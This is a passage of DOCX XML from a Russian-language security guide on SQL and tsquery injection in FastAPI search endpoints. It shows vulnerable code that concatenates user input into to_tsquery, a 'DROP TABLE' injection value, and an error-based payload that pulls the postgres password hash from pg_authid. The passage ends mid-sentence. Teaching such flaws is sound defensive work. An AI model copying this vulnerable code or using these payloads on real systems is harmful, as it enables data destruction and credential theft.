      <w:r>
        <w:t xml:space="preserve"> парсер вместо CAST. Особенность: канал работает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>независимо от наличия search_vector / FTS-data в БД</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> evaluates до WHERE-фильтрации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544BFBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C18BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/articles.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CDE027" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from fastapi import APIRouter, Query, Depends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1D1BAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB77B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy.ext.asyncio import AsyncSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC8657" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from app.db.session import get_session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA8FCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9B56ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0562CFCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA3E71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/articles/advanced-search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA4884" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def advanced_search_articles(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CFD7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", min_length=1),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A5A943" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    lang: str = Query("english"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B24B0"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F9B5A5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E68751" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Антипаттерн: concat user-input в первый аргумент to_tsquery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E1E6B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (попытка добавить wildcard prefix для каждого слова)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C2450" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    expanded = " &amp; ".join(f"{token}:*" for token in q.split())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E9EF65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E91E9D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC458AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE search_vector @@ to_tsquery('{lang}', '{expanded}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B165B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          AND status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE5604D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AC2924" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB30245"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7A6B1A1B"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9D5868D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Двойная ошибка:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97BC19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приходит от пользователя и подставляется через f-string — это уже SQL injection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lang = "english'); DROP TABLE ...; --"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B17BBB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>expanded</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строится из user-tokens через concat. Если token содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или operator-chars — это и tsquery-syntax-injection, и SQL-syntax-injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68890A89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для иллюстрации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>именно tsquery-error-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (без stacked SQL) — упрощённый вариант:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66064E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/articles/search-v2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210CC4B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_v2(q: str = Query(""), ...):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E27293" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Bind для query body, но concat для построения tsquery-string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675234B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (типичный паттерн «expand wildcards»)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC2220" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sanitized = q.replace("'", "")  # naive escape, не помогает для tsquery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6775FC77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34634F14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD70AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE search_vector @@ to_tsquery('english', '{sanitized}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A38A8D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB11917" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571C65EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777EA4AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5080D63E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Кавычки удалены, SQL-injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> блокирован. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всё равно получает user-controlled string внутри SQL-literal — syntax error в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tsquery-парсинге</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выйдет в response, и атакующий может через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`||`-concat внутри SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> подложить subquery в первый аргумент:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A7EE59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — две схемы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6FC6C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант A — direct error-based extraction (когда есть f-string SQL injection через `q`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D291F8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В уязвимом коде выше, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит SQL-syntax </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>-escape, атакующий может построить:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC2F99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /articles/search-v2?q=admin')%20OR%201=(SELECT%20CAST((SELECT%20rolpassword%20FROM%20pg_authid%20WHERE%20rolname='postgres')%20AS%20int))--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AAF698" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q.replace("'", "")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q = "admin) OR 1=(SELECT CAST((SELECT rolpassword FROM pg_authid WHERE rolname=postgres) AS int))--"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это уже разломанная SQL-инъекция (потерял кавычки), но если защита не делает escape, исходный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с кавычками идёт целиком в SQL → SQL-injection 3.5, не 3.15.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C30249" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Чистый tsquery-error канал требует другой уязвимости — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>concat через `||` в SQL уже на стороне tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B4E90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант B — concat через `||` в tsquery-аргумент (требует </w:t>
      </w:r>
      <w:r>
        <w:t>частичная</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
